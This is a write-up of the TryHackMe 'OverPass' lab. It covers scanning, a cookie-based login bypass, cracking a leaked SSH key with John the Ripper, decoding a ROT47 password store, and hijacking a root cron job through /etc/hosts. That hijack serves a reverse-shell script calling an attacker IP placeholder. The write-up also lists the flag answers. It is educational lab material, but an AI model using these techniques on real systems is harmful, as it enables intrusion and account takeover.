OverPass

Target Details

• IP: 10.10.60.248

Nmap Scan

• Scan

  nmap -sV -sC -Pn -oN scan.txt 10.10.60.248

• Output

  # Nmap 7.92 scan initiated Wed Jun 29 11:11:57 2022 as: nmap -sV -sC -Pn -oN scan.txt 10.10.60.248
  Nmap scan report for 10.10.60.248
  Host is up (0.42s latency).
  Not shown: 998 closed tcp ports (conn-refused)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
  |   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
  |_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
  80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
  |_http-title: Overpass
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  # Nmap done at Wed Jun 29 11:13:04 2022 -- 1 IP address (1 host up) scanned in 66.68 seconds

  SSH and HTTP services are open

Find Directories using GoBuster

• scan for directories

  gobuster dir -u "http://10.10.60.248" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --no-error -o web-dirs.txt

  useful link: /admin

Admin Page

• visit Admin Page

• View Source

• Interesting finding was /login.js file, which consists of login logic for client side

• Javascript Function for client side login

  async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = "";
    const creds = { username: usernameBox.value, password: passwordBox.value };
    const response = await postData("/api/login", creds);
    const statusOrCookie = await response.text();
    if (statusOrCookie === "Incorrect credentials") {
      loginStatus.textContent = "Incorrect Credentials";
      passwordBox.value = "";
    } else {
      Cookies.set("SessionToken", statusOrCookie);
      window.location = "/admin";
    }
  }

  From the above piece of code, we can observe that, we can bypass login by setting a cookie from web-browser console (Ctrl+Shift+I -> console tab) and using below method then reload the page

  Cookies.set("SessionToken","random");

• On reloading, we'll get private ssh key id_rsa on the page

  Since you keep forgetting your password, James, I've set up SSH keys for you.
  
  If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
  Also, we really need to talk about this "Military Grade" encryption. - Paradox
  
  -----BEGIN RSA PRIVATE KEY-----
  Proc-Type: 4,ENCRYPTED
  DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337
  
  LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN
  JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal
  73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT
  WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv
  BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ
  AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR
  3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf
  ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk
  VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR
  OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P
  9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze
  eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ
  4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8
  GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn
  exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy
  AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk
  6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58
  dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i
  n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT
  8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K
  4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z
  ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS
  49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2
  +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk
  2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7
  -----END RSA PRIVATE KEY-----

• save the ssh key to a file id_rsa

• provide read and write access to user only

  chmod 600 ./id_rsa

Cracking id_rsa using John The Ripper

• Copy ssh2john.py script to current directory

  cp /usr/share/john/ssh2john.py .

• Using the scipt convert into crackable hash for john

  python ssh2john.py id_rsa | tee ssh-hash.txt

• Crack using john the ripper

  john ssh-hash.txt

  Cracked password: james13

Accessing Target Machine via SSH

• Since, the message was for james, assuming the username to be james, try logging in with the id_rsa file

  ssh -i ./id_rsa james@10.10.60.248

  password: james13

• We'll get access to the shell

  Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64)
  
   * Documentation:  https://help.ubuntu.com
   * Management:     https://landscape.canonical.com
   * Support:        https://ubuntu.com/advantage
  
    System information as of Wed Jun 29 06:39:02 UTC 2022
  
    System load:  0.23               Processes:           88
    Usage of /:   22.3% of 18.57GB   Users logged in:     0
    Memory usage: 16%                IP address for eth0: 10.10.60.248
    Swap usage:   0%
  
  
   * Canonical Livepatch is available for installation.
     - Reduce system reboots and improve kernel security. Activate at:
       https://ubuntu.com/livepatch
  
  47 packages can be updated.
  0 updates are security updates.
  
  
  Last login: Sat Jun 27 04:45:40 2020 from 192.168.170.1
  james@overpass-prod:~$

• On listing directory contents, we'll find the first user.txt flag in james's home directory

Privilege Escalation

• There's another file todo.txt, read file contents

  To Do:
  > Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
  > Write down my password somewhere on a sticky note so that I don't forget it.
    Wait, we make a password manager. Why don't I just use that?
  > Test Overpass for macOS, it builds fine but I'm not sure it actually works
  > Ask Paradox how he got the automated build script working and where the builds go.
    They're not updating on the website

  james has stored password in their password manager

• Download and Read source code of the Overpass Project from the target's HTTP server

• We can make below observations:

  • data is encrypted in ROT47 format in a file

  • data file is located in home directory named .overpass

• Reading contents of ~/.overpass

  cat ~/.overpass
  
  ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.

• We can crack this encryption using online tools CyberChef

• Unencrypted text

  [{"name":"System","pass":"saydrawnlyingpicture"}]

• Download and Upload Linpeas to Target machine

  • Attacker Machine

    ```bash
    # Download Linpeas
    wget https://github.com/carlospolop/PEASS-ng/releases/download/20220626/linpeas.sh
    
    # get tryhackme ip using ifconfig
    # your tunnel can be different
    ifconfig tun0
    ...
    inet [ATTACKER-THM-IP] # this is attacker's tryhackme ip
    ...
    
    # Start HTTP server on Attacker's machine and download it on the target machine where linpeas is stored
    python3 -m http.server
    ```

  • Target Machine

    ```bash
    # download linpeas.sh from attacker's machine
    wget http://[ATTACKER-THM-IP]:8000/linpeas.sh
    
    # execute linpeas
    bash linpeas
    ```

• Linpeas juicy findings

  # cronjob
  * * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
  
  # host file is writable

  it's a cronjob which will run

• Generating attack surface

  • Change overpass.thm ip to attacker's ip

  • Create an evil bash script with path downloads/src/buildscript.sh which will be executed every minute

  • Start HTTP server using python on attacker's machine to serve the file on port 80

  • Get root priviliges

• Executing Attack

  • Target Machine

    ```bash
    # edit overpass.thm ip to attacker's ip
    nano /etc/hosts
    ```

  • Attacker's Machine

    ```bash
    # simulate download directory
    mkdir -p ./www/downloads/src/
    
    # start a new terminal with listener on port 9999
    nc -nlvp 9999
    
    # create reverse shell script
    echo "bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_THM_IP]/9999 <&1'" > ./www/downloads/src/buildscript.sh
    
    # when the cronjob will run again, we'll get a reverse shell
    
    
    # start the server
    cd www
    sudo python3 -m http.server 80
    ```
    
    > This might take time

  • After running the job, we'll get reverse shell

    ```bash
    root@overpass-prod:~#
    ```

• Get Root Flag

  cat /root/root.txt

  Output: thm{7f336f8c359dbac18d54fdd64ea753bb}

Answers

• Q. Hack the machine and get the flag in user.txt

  thm{65c1aaf000506e56996822c6281e6bf7}

• Q. Escalate your privileges and get the flag in root.txt

  thm{7f336f8c359dbac18d54fdd64ea753bb}